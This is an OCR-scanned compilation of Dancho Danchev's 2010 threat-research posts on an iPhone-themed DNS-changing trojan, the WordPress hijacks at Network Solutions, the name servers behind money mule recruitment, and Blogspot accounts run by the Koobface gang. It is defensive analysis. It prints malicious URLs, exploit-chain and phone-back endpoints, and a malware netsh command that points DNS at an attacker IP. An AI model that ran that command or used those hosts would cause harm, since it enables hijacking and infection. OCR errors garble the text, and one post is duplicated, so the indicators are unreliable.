[13] New ransomware locks PCs, demands premium SMS for 
removal 

[14] Scareware meets ransomware: "Buy our fake product 
and we'll decrypt the files" 

[15[Who's behind the GPcode ransomware? 

[16]How to recover GPcode encrypted files? 

[17JSMS Ransomware Displays Persistent Inline Ads 

[18JSMS Ransomware Source Code Now Offered for Sale 

[19] 3rd SMS Ransomware Variant Offered for Sale 

[20] 4th SMS Ransomware Variant Offered for Sale 

[21] 5th SMS Ransomware Variant Offered for Sale 

[22] 6th SMS Ransomware Variant Offered for Sale 

This post has been reproduced from [23]Dancho Danchev's 
blog. Follow him [24]on Twitter. 
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iPhone Unlocking Themed Malware Campaign 
Spamvertised (2010-04-14 20:20) 






































UPDATED: Sunday, April 18, 2010: The folks at 
[lJEmergingThreats pinged me on the fact that immediately 
after the brief assessment went public, the cybercriminals 
moved iphone-iphone.info to 174.37.172.68 (SoftLayer 

Technologies Inc.) Currently responding to the same IP are 
also the following domains known to have been con¬ 
nected with previous malware campaigns - startexag.com - 
Email: venterprize@gmaii.com; exposingpics.com, and 
animezhd.com. 

Researchers from [2]BitDefender are reporting on a currently 
spamvertised malware campaign, using a " Unlock, Jailbrake 
and "hack"tivate iPhone 

3.1.3" theme. 

The 

spamvertised 


domain 



iphone-iphone.info 


188.210.236.181 


Email: 

iphone- 

iphone.info@protecteddomainservices.com, is enticing the 
end user into download the malware from 

pepd.org/blackraln.exe -188.210.236.109 - Email: 
pepd. org@protecteddomainservices. com. 
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Detection rate: blackraln.exe - [3 JTrojan.BAT. A ACL - Result: 
10/40 (25 %), with the malware itself attempting to change 
the default DNS settings on the infected hosts to the 
following IP - 188.210.236.250 (188-210-236- 
250.hotnet.ro), AS39443, HOTNET-AS SC Hot Net SRL Baia de 
Aries, Nr 3, Bl 5B, Sc A, Ap 39, Bucuresti, 6. 

- Creates the following registry entry in an attempt to 
change default DNS settings: 

HKEY LOCAL _MACHINE\SYSTEM\ControlSet001 \Ser 
vices\Tcpip\Parameters\lnterface s| {5D19E473-BE30-416B- 

B5C7-D8A 091C41D2F } "NameServer" = 188.210.236.250 

- Creates Process - Filename () Command Line: 


(C:\WINDOWS\system32\NETSH. EXE: interface ip set dns 
"Local Area Connection" static 188.210.236.250) As User: 

() Creation Flags: (CREATE_DEFAULT_ERROR _MODE CREATE 
SUSPENDED) interface ip set dns "wireles 

network connection" static 188.210.236.250) As User: () 
Creation Flags: (CREATE DEFAULT ERROR _MODE CREATE 

SUSPENDED) 

From Romania, with DNS changing malware. 

This post has been reproduced from [4]Dancho Danchev's 
blog. Follow him [5Jon Twitter. 

1. httoj//www. emer ain athreats.net/ 

2. htto.V/www. malwarecitv. com/bio a/i phone-unlockino-tricks- 
aet-ocs- : -nto~ trouble- 791 .htmi 

3. 

http://www. virustotal. com/analisis/f99906a458042a4caf5fc0 

7193fb54c290c55560c28c35ba 78b5a95bl dfe0fe8-12 712 

67435 

4. http.V/ddanchev.blo as pot.com/ 
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5. http://twitter.com/danchodanchev 

312 

Face book FarmTown Malvertising Campaign Courtesy 
of the Koobface Gang (2010-04-16 19:03) 















Earlier this week, another malvertising campaign affected a 
popular community, in the face of Facebook's FarmTown. 

You have to analyze, and cross-check it to believe it. 

Key summary points: 

• the email test@now.net.cn used to register all the domains 
involved in the malvertising campaign, is exclusively used by 
the Koobface gang for numerous scareware registrations 
seen - 

a 
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Dissecting the WordPress Blogs Compromise at 
Network Solutions (2010-04-18 23:31) 

UPDATED: Network Solutions [ljissued an update to the 
situation. 

The folks at Sucuri Security have posted an update on 

[2]the reemergence of mass site compromises at Net¬ 
work Solutions, following [3]last week's WordPress 
attack. 

What has changed since last week's campaign? Several new 
domains were introduced, including new phone 

back locations, with the majority of new domains once again 
parked on the same IP as they were last week - 

64.50.165.169 - AS15244, LUNARPAGES proxy aut-num for 
Lunarpages by MZIMA. 


The exploitation chain of the currently embedded domain is 
as follows: 

- corpadsinc.com/grep /?spl=3 &br=MSIE Severs=7.0 
&s= 

- corpadsinc.com /grep/soc.php 

- corpadsinc.com /grep/load.php?spl=ActiveX pack 

- corpadsinc.com /grep/load.php?spl=pdf 2020 

- corpadsinc.com /grep/load.php?spl=javal 

- corpadsinc.com /grep/j2 079.jar 

Detection rates for some of the obtained exploits: 

- update, vbe - [4]VB5:Encrypted-gen; Trojan- 
Downioader.VBS.Agent.yw - Result: 11/40 (27.5 %) 

- j2 079.jar - [5JExpioit.Java.29; Exploit.Java.CVE-2009- 
3867. c; JAVA/Byteverify. O - Result: 5/40 (12.5 %) 314 
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Responding to 64.50.165.169 - AS15244, LUNARPAGES proxy 
aut-num for Lunarpages by MZIMA are also: 

binglbalts.com - Email: aiexl978a@bigmir.net 

corpadsinc.com - Email: alexl978a@bigmir.net 

fourkingssports.com - Email: alexl978a@bigmir.net 

networkads.net - Email: alexl978a@bigmir.net 

mainnetsoll.com - Email: alexl978a@bigmir.net 


las vegastechreport. com 
ma uiexperts, com 
ma uisportsinsider. com 

Upon successful exploitation from corpadsinc.com the 
campaigns drops load.exe - [6]Trojan:Win32/Meredrop; 
Trojan. Win32.Sasfis. a (v) - Result: 7/40 (17.50 %). 

The sample load.exe also phones back to the following 
locations: 

- nonstopacc.com/tmp /bb.php?v=200 &id=130306319 
&b=7231522200 &tm=8 -188.124.16.95 - Email: 

alexl978a@bigmir.net 

- nonstopacc.com/tmp /bb.php?v=200 &id=130306319 
&tid=6 &b=7231522200 &r=l &tm=9 

-188.124.16.96 /blackout _dem.exe 

Detection rate for blackout _dem.exe - [/JTrojan-Dropper - 
Result: 7/40 (17.5 %) which phones back to 

mazcostrol.com/inst.php ?aid=blackout - 

188.124.16.103 - Email: aiexl978a@bigmir.net. 

Interestingly „ the sample attempts to install a Firefox add-on 
in the following way: 


%ProgramFiies 

%\Mozilla 


Firefox\extensions I 



{8CE11043-9A15-4207-A565-0C94C42D590D 
}\chrome\content\timer.xul - MD5: 

963136ADAA2B1C823F6C0E355800CE02 Detected by 
different vendors as IRC/Flood, gen. h or TROJ BUZUS.ZYX; 
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It's also worth pointing out that the campaign's admin panel 
is pointing to a third-party - cybercrime friendly IP that's 
currently offline - corpadsinc.com/grep/stats.php -> 
HTTP/1.1 302 Found at 217.23.14.25, AS49981, 
WorldStream = Transit imports = -CAIW. 

The bottom line - although [8]Network Solutions criticized 
the [9/media last week, for blaming this [10]on Net¬ 
work Solutions, or [HJWordPress itself, the company should 
realize that for the sake of its reputation it should always use 
the following mentality - " protect the end user from himself" 
when offering any of its services. 

Related WordPress security resources: 

[12J20 Wordpress Security Plug-ins And Tips To keep Hackers 
Away 

[13] 11 Best Ways to Improve WordPress Security 

[14J20+ Powerful Wordpress Security Plugins and Some Tips 
and Tricks 

This post has been reproduced from [15]Dancho Danchev's 
blog. Follow him [16]on Twitter. 

1. httoV/bloa. networksolutions. com/2010/we-feel-vour-pain- 
and-are-workina-hard-to-fix-this/ 








2. http://bloa.sucuri. net/2010/04/network-solutions-hacked- 
a aain.html 

3. htto://bloa.sucuri. net/2010/04/network-solutions-hacked- 
a aain.html 

4. 

http://www. virustotal. com/analisis/1486cf5ccaa9d4539b8743 

cl 96ccb448ca40 77ccfefadb 745468a4c43f889f23-12 716 

24610 

5. 

htto://www. virustotal. com/analisis/18dbae8296el274259edf 

49d0e35cl b911 c56adl 021ef5ca6a5f49b9b915c2db-12 716 

24626 

6 . 

htto://www. virustotal. com/analisis/9e4edc0064249f2cd5cfcb 

89 7a 6c66a4ea3h9955e444dl 4b45 7e6afabfl 6dfl 5-12716 

16768 

7. 

htto: //www. virustotal. com/analisis/5c84af8ec355cc2d534914 

26810c2el55 79092f85f0d2 7248el38604 76c76671-12716 

24608 

8. htto://bloa.networksolutions.com/2010/alert-WordPress- 
bloa-network-solutions/ 
























9. http://bloa.networksolutions.com/201O/uodate-word-oress- 
issue-fixed/ 


10. http://bloa.networksolutions.com/2010/update-word- 
press-issue-fixed/ 

11. http://wordpress.org/development/2010/04/file- 
permissions/ 

12. http: //blog, ta rag ana, com/index, ph p/archive/20- 
wordpress-securit v- p/ug-ins-and-tips-to-keep-hackers-a i wa v/ 

13. http://www.probloadesian.com/wprdpress/11 -best-wa vs- 
to-improve-wordpress-secuht v/ 

14. htto.V/soeckvbov. com/2009/09/22/20-powerfui- 
wordpress-securit v- pluains-and-some-tiDS-and-tricks/ 

15. http.V/ddanchev. blo g s pot, cam/ 

16. http://twitter, com/danchodanchev 
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Dissecting the WordPress Blogs Compromise at 
Network Solutions (2010-04-18 23:31) 

UPDATED: Network Solutions [1 /issued an update to the 
situation. 

The folks at Sucuri Security have posted an update on 

[2]the reemergence of mass site compromises at Net¬ 
work Solutions, following [3]last week's WordPress 
attack. 












































What has changed since last week's campaign? Several new 
domains were introduced, including new phone 

back locations, with the majority of new domains once again 
parked on the same IP as they were last week - 

64.50.165.169 - AS15244, LUNARPAGES proxy aut-num for 
Lunarpages by MZIMA. 

The exploitation chain of the currently embedded domain is 
as follows: 

- corpadsinc.com/grep /?sp\=3 &br=MS!E Severs=7.0 
SeS= 

- corpadsinc.com /grep/soc.php 

- corpadsinc.com /grep/load.php?spi=ActiveX pack 

- corpadsinc.com /grep/load.php?spl=pdf 2020 

- corpadsinc.com /grep/load.php?spl=javal 

- corpadsinc.com /grep/j2 079.jar 

Detection rates for some of the obtained exploits: 

- update, vbe - [4]VBS:Encrypted-gen; Trojan- 
Downioader.VBS.Agent.yw - Result: 11/40 (27.5 %) 

- j2 079.jar - [5jExpioit.Java.29; Exploit.Java.CVE-2009- 
3867. c; JAVA/Byteverify. O - Result: 5/40 (12.5 %) 317 

Responding to 64.50.165.169 - AS15244, LUNARPAGES proxy 
aut-num for Lunarpages by MZIMA are also: 

binglbalts.com - Email: aiexl978a@bigmir.net 


corpadsinc.com - Email: alexl978a@bigmir.net 
fourkingssports.com - Email: aiexl978a@bigmir.net 
networkads.net - Email: alexl978a@bigmir.net 
mainnetsoll.com - Email: alexl978a@bigmir.net 

las vegastechreport. com 
ma uiexperts, com 
ma uisportsinsider. com 

Upon successful exploitation from corpadsinc.com the 
campaigns drops load.exe - [6]Trojan:Win32/Meredrop; 
Trojan. Win32.Sasfis. a (v) - Result: 7/40 (17.50 %). 

The sample load.exe also phones back to the following 
locations: 

- nonstopacc.com/tmp /bb.php?v=200 &id=130306319 
&b=7231522200 &tm=8 - 188.124.16.95 - Email: 

alexl978a@bigmir.net 

- nonstopacc.com/tmp /bb.php?v=200 &id=130306319 
&tid=6 &b=7231522200 &r=l &tm=9 

-188.124.16.96 /blackout _dem.exe 

Detection rate for blackout _dem.exe - [7]Trojan-Dropper - 
Result: 7/40 (17.5 %) which phones back to 

mazcostroi.com/inst.php ?aid=blackout - 

188.124.16.103 - Email: alexl978a@bigmir.net. 

Interestingly , the sample attempts to install a Firefox add-on 
in the following way: 



%ProgramFiles 

%\Mozilla 

Firefox\extensions I 

{8CE11043-9A15-4207-A565-0C94C42D590D 
}\chrome\content\timer.xul - MD5: 

963136ADAA2B1C823F6C0E355800CE02 Detected by 
different vendors as IRC/Flood, gen. h or TROJ BUZUS.ZYX; 
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It's also worth pointing out that the campaign's admin panel 
is pointing to a third-party - cybercrime friendly IP that's 
currently offline - corpadsinc.com/grep/stats.php -> 
HTTP/1.1 302 Found at 217.23.14.25, AS49981, 
WorldStream = Transit imports = -CAIW. 

The bottom line - although [8]Network Solutions criticized 
the [9]media last week, for blaming this [10]on Net¬ 
work Solutions, or [llJWordPress itself, the company should 
realize that for the sake of its reputation it should always use 
the following mentality - " protect the end user from himself" 
when offering any of its services. 

Related WordPress security resources: 

[12J20 Wordpress Security Plug-ins And Tips To keep Hackers 
Away 

[13] 11 Best Ways to improve WordPress Security 



[14J20+ Powerful Word press Security Plugins and Some Tips 
and Tricks 

This post has been reproduced from [15]Dancho Danchev's 
blog. Follow him [16]on Twitter. 

1. http://bloa. networksolutions. com/2010/we-feel-vour-pain- 
and-are-workina-hard-to-fix-this/ 

2. http://bloa.sucuri. net/2010/04/network-solutions-hacked- 
a aain.html 

3. htto.V/bloa.sucuri. net/2010/04/network-solutions-hacked- 
a aain.html 

4. 

http: //www. virustotal. com/analisis/1486cf5ccaa9d4539b8743 

cl 96ccb448ca40 7Jccfefadb 745463a4c43f889f23-12 716 

24610 

5. 

http://www. virustotal. com/analisis/18dbae8296el274259edf 

49d0e35clb911c56adl021ef5ca6a5f49b9b915c2db-12716 

24626 

6 . 

http://www. virustotal. com/analisis/9e4edc0064249f2cd5cfcb 

89 7a 6c66a4ea3b9955e444dl 4b45 7e6afabfl 6dfl 5-12716 

16768 


7 . 























htto: //www. virustotal. com/analisis/5c84af8ec355cc2d534914 

26810c2el 55 79092f85f0d27248el 38604 76c76671-12716 


24608 

8. http://bloa.networksolutions.com/201O/alert-WordPress- 
bloa-network-solutions/ 

9. http://bloa.networksolutions.com/2010/update-word-press- 
issue-fixed/ 

10. htto://bloa.networksolutions.com/201O/uodate-word- 
press-issue-fixed/ 

11. http://wordpress.ora/development/2010/04/file- 
permissions/ 

12. http://bloa. taraaana. com/index, oh o/archive/20- 
wordpress-securit v- plua-ins-and-tips-to-keep-hackers-a wa v/ 

13. http://www.probloodesian.com/wordpress/11 -best-wa vs- 
to-impro ve- wordpress-securit v/ 

14. http://speckvbov. com/2009/09/22/20-powerful- 
wordpress-securit v- pluains-and-some-tips-and-tricks/ 

15. http.V/ddanchev.blo as pot.com/ 

16. http .-//twitter, com/da nchodanchev 
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The DNS Infrastructure of the Money Mule 
Recruitment Ecosystem (2010-04-20 18:46) 

What's the most static element of the vibrant money mule 
recruitment ecosystem? It's the DNS infrastructure that 



















































the the cybercriminals behind the campaigns repeatedly use 
to push new scams. 

This post aims to expose the name servers involved, the 
associates ASs, using the research previously con¬ 
ducted on their recruitment campaigns, and their affiliations 
with multiple other cybercrime activities. 

Moreover, it's main objective is the emphasize on the fact 
that - cybercrime should stop being treated as a 

country/region specific problem, instead it should be 
treated as an international problem, with each and 
every country having its own share of cybercrime 
activity. 

• " The whole is greater than the sum of its parts" - 
[ 1 JAristotle 
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With money mule recruitment available as-a-service 
([2]Standardizing the Money Mule Recruitment 
Process) the post will only detail the activities of what's 
referred to as a " mule recruitment syndicate", in short, one 
of the most prolific syndicates with direct connections to 
numerous related cybercrime campaigns profiled over the 
past 6 

months. 

What makes an impression is the geographical distribution of 
the name servers. 11 of them are based in the 


Netherlands, another 11 are based in China, followed by 11 
more based in the United States. Here's the list of the 
related ASs and their occurrences: 

• AS34305, EUROACCESS Global Autonomous System - 

The Netherlands -11 name servers 

• AS38356, TimeNet - China -11 name servers 

• AS46664, VolumeDrive - United States -11 name 
servers 

• AS30517, Great Lakes Comnet, Inc. - United States - 9 
name servers 

• AS32097, RoadRunner RR-RC-Wholesale Internet, 
Inc.-KansasCity - United States - 9 name servers 

• AS29182, ISPSYSTEM-AS ISPsystem Autonomous 
System - Belgium - 8 name servers 

• AS 31103, KEYWEB-AS Key web AG - Germany -1 name 
servers 
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Moreover, this persistent money mule recruitment syndicate 
has a domain registrar of choice in the face of the 


Turkish, [3JALATRON BUD., which is seen in the majority of 
domain registrations. 

The following active name servers have been gathered 
from the money mule recruitment campaigns profiled 

in previous posts: 

• [4]Keeping Money Mule Recruiters on a Short Leash - Part 
Four 
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• [5]Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

• [6]Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

• [7]Keeping Money Mule Recruiters on a Short Leash 

• [8]Keeping Reshipping Mule Recruiters on a Short Leash 

nsl.alwaysexit.com - 92.63.111.146 - Email: 
sob@bigmailbox.ru - AS29182, ISPSYSTEM-AS ISPsystem 
Autonomous System 

ns2.alwaysexit.com - 85.12.46.2 - AS34305, EUROACCESS 
Global Autonomous System 

ns3.alwaysexit.com - 222.35.143.112 - AS38356, TimeNet 


nsl.benjenkinss.cn - 92.63.110.85 - Email: chunk@qx8.ru 
- AS29182, ISPSYSTEM-AS ISPsystem Autonomous System 
ns2.benjenkinss.cn - 85.12.46.2 - AS34305, EUROACCESS 
Global Autonomous System 

ns3.benjenkinss.cn - 222.35.143.112 - AS38356, Time Net 

nsl.bizrestroom.ee - 92.63.110.85 - Email: hook@5mx.ru - 
AS29182, ISPSYSTEM-AS ISPsystem Autonomous System 
ns2.bizrestroom.ee -193.104.106.30 - AS34305, 
EUROACCESS Global Autonomous System 

ns3.bizrestroom.ee - 222.35.143.234 - AS38356, TimeNet 
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nsl.ehinegrowth.ee - 92.63.111.196 - Email: 
duly@fastermail.ru - AS29182, ISPSYSTEM-AS ISPsystem 
Autonomous System 

ns2.chinegrowth.cc - 85.12.46.4 - AS34305, EUROACCESS 
Global Autonomous System 

ns3.chinegrowth.cc - 222.35.143.112 - AS38356, TimeNet 

nsl.ennandpizza.ee - 87.118.81.75 - Email: 
bears@fastermail.ru - AS31103, KEYWEB-AS Key web AG 

ns2.cnnandpizza.cc -193.104.106.30 - AS34305, 
EUROACCESS Global Autonomous System 

ns3.cnnandpizza.cc - 222.35.143.236 - AS38356, TimeNet 


nsl.greezly.net - 64.85.174.143 - Email: erupt@qx8.ru - 
64.85.160.0/20, AS30517, Great Lakes Com net, Inc. 

ns2.greezly.net - 204.12.217.250 - AS32097, RoadRunner 
RR-RC-Wholesale Internet, Inc.-KansasCity 

ns3.greezly.net - 204.124.182.151 - A546664, 
VolumeDrive 

nsl.maninwhite.ee - 92.63.111.146 - Email: 
duly@fastermail.ru - 92.63.110.0/23 - A529182, ISPSYSTEM- 
AS ISPsystem Autonomous System 

ns2.maninwhite.ee - 85.12.46.3 - AS34305, EUROACCESS 
Global Autonomous System 

ns3.maninwhite.ee - 222.35.143.234 - AS38356, TimeNet 
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nsl.partytimee.cn - 92.63.111.146 - Email: chunk@qx8.ru 
- 92.63.110.0/23 - AS29182, ISPSYSTEM-AS ISPsystem 
Autonomous System 

ns2.partytimee.cn - 85.12.46.4 - AS34305, EUROACCESS 
Global Autonomous System 

ns3.partytimee.cn - 222.35.143.235 - AS38356, TimeNet 

nsl.sandhouse.ee - 64.85.174.146 - Email: 
taunt@freenetbox.ru - 64.85.160.0/20 - AS30517, Great 
Lakes Comnet, Inc. 


ns2.sandhouse.ee - 204.12.217.253 - AS32097, 
RoadRunner RR-RC-Wholesale Internet, Inc.-KansasCity 

ns3.sandhouse.ee - 74.118.194.82 - AS46664, 

VolumeDrive 

nsl.transiatasheep.net - 92.63.111.127 - Email: 
stair@freenetbox.ru - 92.63.110.0/23 - A529182, ISPSYSTEM- 
AS 

ISPsystem Autonomous System 

ns2.transiatasheep.net - 85.12.46.2 - AS34305, 
EUROACCESS Global Autonomous System 

ns3.transiatasheep.net - 222.35.143.112 - AS38356, 
TimeNet 

nsl.trythisok.cn - 92.63.111.127 - Email: chunk@qx8.ru - 
AS29182, ISPSYSTEM-AS ISPsystem Autonomous System 
ns2.trythisok.cn - 85.12.46.2 - AS34305, EUROACCESS 
Global Autonomous System 

ns3.trythisok.cn -222.35.143.235 - AS38356, TimeNet 
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nsl. viewdreamer.com - 64.85.174.143 - 

free@freenetbox.ru - 64.85.160.0/20, AS30517, Great Lakes 
Comnet, Inc. 


ns2.viewdreamer.com - 204.12.217.250 - AS32097, 
RoadRunner RR-RC-Wholesale Internet, Inc.-KansasCity 
ns3.viewdreamer.com - 74.118.194.82 - AS46664, 
VolumeDrive 

nsl.volcanotime.com - 64.85.174.144 - Email: 
hs@bigmailbox.ru - A530517, Great Lakes Com net, Inc. 

ns2.volcanotime.com -204.12.217.251 - AS32097, 
RoadRunner RR-RC-Wholesale Internet, Inc.-KansasCity 
ns3.volcanotime.com - 74.118.194.88 - AS46664, 
VolumeDrive 

nsl.weathernot.net - 64.85.174.145 - Email: 
bowls@5mx.ru - AS30517, Great Lakes Comnet, Inc. 

ns2.weathernot.net - 204.12.217.252 - AS32097, 
RoadRunner RR-RC-Wholesale Internet, Inc.-KansasCity 
ns3.weathernot.net - 74.118.194.89 - AS46664, 
VolumeDrive 

nsl.worldslava.ee - 64.85.174.145 - Email: 
fussy@bigmailbox.ru -AS30517, Great Lakes Comnet, Inc. 

ns2.worldslava.ee - 204.12.217.252 - AS32097, 
RoadRunner RR-RC-Wholesale Internet, Inc.-KansasCity 
ns3.worldslava.ee - 74.118.194.84 - AS46664, 
VolumeDrive 


nsl.jockscreamer.net - 64.85.174.144 - Email: 
free@freenetbox.ru - AS30517, Great Lakes Comnet, Inc. 

ns2.jockscreamer.net - 204.12.217.251 - AS32097, 
RoadRunner RR-RC-Wholesale Internet, Inc.-KansasCity 
ns3.jockscreamer.net - 74.118.194.83 - AS46664, 
VolumeDrive 

nsl.uleaveit.com - 64.85.174.146 - Email: plea@qx8.ru - 
AS30517, Great Lakes Comnet, Inc. 

ns2.uleaveit.com - 204.12.217.253 - AS32097, 

RoadRunner RR-RC-Wholesale Internet, Inc.-KansasCity 

ns3.uleaveit.com - 74.118.194.85 - AS46664, VolumeDrive 

nsl.bergamoto.com - 74.118.194.84 - Email: 
nine@freenetbox.ru - AS46664, VolumeDrive 

ns2.bergamoto.com - 222.35.143.235 - AS38356, Time Net 

ns3.bergamoto.com - 85.12.46.2 - AS34305, EUROACCESS 
Global Autonomous System 

nsl.diunar.cc - 74.118.194.82 - Email: yuck@maillife.ru - 
AS46664, VolumeDrive 

ns2.diunar.cc - 222.35.143.112 - AS38356, Time Net 

ns3.diunar.cc - 85.12.46.2 - AS34305, EUROACCESS Global 
Autonomous System 
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nsl.pesenlife.net - 64.85.174.147 - Email: erupt@qx8.ru - 
AS30517, Great Lakes Comnet, Inc. 


ns2.pesenlife.net - 204.12.217.254 - AS32097, 

RoadRunner RR-RC-Wholesale Internet, Inc.-KansasCity 
ns3.pesenlife.net - 74.118.194.86 - AS46664, VolumeDrive 

The business model if this syndicate can be easily compared 
to the business model of the much hyped Rus¬ 
sian Business Network in the sense that, they are either 
managing the infrastructure for someone else as a service, 
are directly involved in the recruitment and utilization of 
money mules for their own purposes, or a basically building 
inventory of mules to offer as a service to a large number of 
cybercriminals. 

The basic fact that these folks are not campaign-centered, 
but continue maintaining their ecosystem, puts 

them on the top of watch list for months to come. 

Related coverage of money laundering in the context 
of cybercrime: 

[9] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[10] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[llJKeeping Money Mule Recruiters on a Short Leash - Part 
Three 

[12] Money Mule Recruiters on Yahoo!'s Web Hosting 

[13] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[14] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 



[15] Keeping Reshipping Mule Recruiters on a Short Leash 

[16] Keeping Money Mule Recruiters on a Short Leash 

[17] Standardizing the Money Mule Recruitment Process 

[18] lnside a Money Laundering Group's Spamming 
Operations 

[19] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[20] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [21 ]Dancho Danchev's 
blog. Follow him [22Jon Twitter. 
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mule-recruiters-on-short.html 

10. http.V/ddanchev.blo as oot.com/2010/03/monev-mule- 
recruitment-camoaian-servina.html 

11. http://ddanchev.b/o as pot.com/2010/03/keepina-mone v- 
mule-recruiters-on-short. html 

12. http.V/ddanchev.b/o as pot.com/2010/03/monev-mule- 
recruiters-on-vahoos-web.html 

13. http.V/ddanchev. blo as oot. com/2010/02/dissectin a- 
on aoina-monev-mule.html 

14. http.V/ddanchev.blo as oot.com/2010/02/keeoina-mone v- 
m ule-recruiters-on-short. h tmi 

15. http.V/ddanchev. blo as oot. com/2009/12/keeoin a- 
reshi o oina-mule-recruiters-on.html 

16. http.V/ddanchev.blo as oot.com/2009/11/keeoina-mone v- 
mule-recruiters-on-short. html 
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17. http.V/ddanchev.blo as oot.com/2009/10/standardizin a- 
monev-mule-recruitment.html 

18. http.V/ddanchev.blo as oot.com/2009/05/inside-mone v- 
launderin a- arouos-soammina.html 

19. http.V/ddanchev.blo as oot.com/2008/07/monev-mule- 
recruiters-use-asoroxs-fast.html 

20. http.V/ddanchev.blo as oot.com/2008/10/monev-mules- 
s vndicate-activelv.html 



























































21. htto.V/ddanchev.blo as oot.com/ 

22. http://twitter.conn/danchodanchev 
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Dissecting Koobface Gang's Latest Facebook 
Spreading Campaign (2010-04-27 14:53) 

UPDATED: Thursday, April 29, 2010: Google is aware of 
these Biogspot accounts, and is currently suspending them. 

During the weekend, our "dear friends" from [IJthe 
Koobface gang - folks, you're so not forgotten, with the 
scale of diversification for your activities to be publicly 
summarized within the next few days - launched another 
spreading attempt across Facebook, with Koobface-infected 
users posting bogus video links on their walls. 

• Recommended reading: [2] 10 things you didn't know 
about the Koobface gang 

What's particularly interesting about the campaign, is that 
the gang is now start to publicly acknowledge its 
connections with [3 Jxorg.pl (Malicious software includes 
40706 scripting exploit(s), 4119 trojan(s), 1897 exploit(s), 
with an actual subdomain residing there embedded on 
Koobface-serving compromised hosts. 

Moreover, the majority of sea reware domains, including the 
redirectors continue using hosting services in 

Moldova, A531252, STARNET-AS Star Net Moldova in 
particular. 





• [4] Koobface Redirectors and Sea re ware Campaigns 
Now Hosted in Moldova 
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With the campaign still ongoing it's time to dissect it, expose 
the sea re ware domains portfolio and the A529073, EC ATEL- 
AS connection, with the Koobface gang a loyal customer of 
their services since November, 2009. AS29073, ECATEL-AS 
Koobface gang connections: 

• [5]Koobface Botnet's Scareware Business Model - 
Part Two 

• [6]The Koobface Gang Wishes the Industry "Happy 
Holidays" 

Automatically registered B log spot accounts used as bogus 
video links across Facebook: 

aashikamorsing. blog spot, com 

aipezajeromie. blog spot, com 

andcoldjackey. blog spot, com 

asiaasiabenzaidi. blog spot, com 

a talaygraciani. blog spot, com 

barsheshetshakira t. blogspo t. com 

ba ttittastelzer. blog spot, com 

beckermasico. blog spot, com 

biedlerharjit. blog spot, com 


britainudobot. blog spot, com 
bruchnadirnadir. blog spot, com 
bryonbryonhofhenke.blogspot.com 
cecelia verner. blogspo t. com 
centofantia viran.blogspot. com 
codeycodeymarcott. blog spot, com 
cottinghamginnyginny. blog spot, com 
courtenayharry. blog spot, com 
dalton-da viesheinee. blog spot, com 
dipietroa udrea.blogspot. com 
ericssonbrigid. blog spot, com 
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ervinervinturnquest. blog spot, com 
fashingbauerkylerkyler. blog spot, com 
felicetanae. blog spot, com 
friedamignogna.blogspot. com 
friedlamiraslani. blog spot, com 
garthgarthheal. blog spot, com 
ga vin- williamslielie. blog spot, com 
ginno viaharbottle. blog spot, com 



grinolsisanna. blog spot. com 
hamiltondesantis. blog spot, com 
hananhananmoros-hanley. blog spot, com 
heberheberdellinger. blog spot, com 
iftikharkacykacy. blog spot, com 
imtiazzimmer.blogspot. com 
ireneirenejasmen. blog spot, com 
jacojaco wintermeyer. blog spot, com 
jameishaleninger. blog spot, com 
jhalaagustin.blogspot. com 
johnathenmirani. blog spot, com 
kassablynnelle. blog spot, com 
kaycieazoni. blog spot, com 
keeferjeneejenee. blog spot, com 
keibakeibaclarembeaux. blog spot, com 
kieroncro wdus. blog spot, com 
kilcullenheadhead. blog spot, com 
kreuzaa vins. blog spot, com 
labba toalphaj. blog spot, com 
lellpeyton.blogspot. com 



marleenmckoi. blog spot, com 
mccarlbargin.blogspot. com 
mendizabalnayranayra.blogspot. com 
mitranoshaghayegh.blogspot.com 
momoneybeltz. blog spot, com 
mushenkolirian. blog spot, com 
na varretemcarthur. blog spot, com 
nekolnekoltasler. blog spot, com 
nightrasteyn. blog spot, com 
nushnushca ve.blogspot. com 
ortiz-maynardyvreene. blog spot, com 
padalinodarcydarcy. blog spot, com 
pantslalala.blogspot. com 
papsteinha tern wahsh.blogspot. com 
pa van pa vandekelver. blog spot, com 
pencekleighan. blog spot, com 
puzderdenzel. blog spot, com 
rabiarabiacarruth.blogspot. com 
raeferaefejhanmmat.blogspot.com 
raheelolu. blog spot, com 



ranaranakundu. blog spot, com 
sabeenhunjan.blogspot.com 
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serroukhshymia.blogspot. com 
sertimamislay. blog spot, com 
shannonschronce. blog spot, com 
sheridanpaltiel. blog spot, com 
slomovitzva ughna.blogspot. com 
soccicoitcoit. blog spot, com 
stengel-bohneina veina v. blog spot, com 
suedeglenna.blogspot. com 
sylvainbarnes-rivers. blog spot, com 
tammeybutenko. blog spot, com 
tartaglia tray vis. blogspo t. com 
tasunanette. blog spot, com 
teddiedommasch.blogspot. com 
temitopetodoro va. blogspo t. com 
terra novatai wan. blogspot. com 
torneyatsushi. blogspot. com 
tro vatohaiahaia. blogspot. com 



tuncelintrieri. blog spot, com 
vislayo vado vad. blog spot, com 
wellkensie. blogspo t. com 
yabsleyjessajessa. blog spot, com 
zedzedmorelle. blog spot, com 

UPDATED: Thursday , April 29, 2010: Another update 
Blog spot Accounts courtesy of the Koobface gang: 

aaslehnekaya.blogspot. com 

aimanaimanpaulis. blog spot, com 

altonaltonbruyninckx. blog spot, com 

annemiekenorford. blog spot, com 

asghardch.blogspot. com 

atencioishmael.blogspot. com 

a tivanichayaphongdionysios. blogspo t. com 

ayorindesa voia. blogspo t. com 

bagnoandreae.blogspot.com 

bakalarczykmaipumaipu. blog spot, com 

baribarithulin.blogspot. com 

be a vorda wneda wne. blog spot, com 

boninidivandivan.blogspot. com 



cabooterfinne. blog spot, com 
chakkarinlehnertz. blogspot. com 
cha varriaarumugam. blog spot, com 
coleirolenaylenay. blog spot, com 
colkittmogens. blog spot, com 
crummittgerhardt. blog spot, com 
dahmeiale veque. blog spot, com 
dalmolinparamparam. blog spot, com 
danaedanaemadan.blogspot.com 
danmakumaak. blog spot, com 
da un tazusaazusa. blogspo t. com 
devrimmasaimasai. blog spot, com 
dicksdeplancke. blog spot, com 
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dormiedyismael. blog spot, com 
dremadremareany. blog spot, com 
duffinflippen.blogspot. com 
eliyahneubecker. blog spot, com 
